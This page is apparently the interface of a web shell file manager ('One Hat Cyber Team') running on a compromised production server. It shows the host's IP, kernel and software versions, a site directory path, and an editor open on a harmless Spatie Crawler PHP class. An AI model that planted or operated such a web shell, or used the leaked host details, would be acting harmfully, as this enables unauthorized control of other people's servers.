One Hat Cyber Team
Your IP :
3.129.216.43
Server IP :
104.21.16.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
forge
/
gftag.com
/
vendor
/
spatie
/
crawler
/
src
/
Edit File:
CrawlUrl.php
<?php namespace Spatie\Crawler; use Psr\Http\Message\UriInterface; class CrawlUrl { /** @var \Psr\Http\Message\UriInterface */ public $url; /** @var \Psr\Http\Message\UriInterface */ public $foundOnUrl; /** @var mixed */ protected $id; public static function create(UriInterface $url, ?UriInterface $foundOnUrl = null, $id = null) { $static = new static($url, $foundOnUrl); if ($id !== null) { $static->setId($id); } return $static; } protected function __construct(UriInterface $url, $foundOnUrl = null) { $this->url = $url; $this->foundOnUrl = $foundOnUrl; } /** * @return mixed|null */ public function getId() { return $this->id; } public function setId($id) { $this->id = $id; } }
Simpan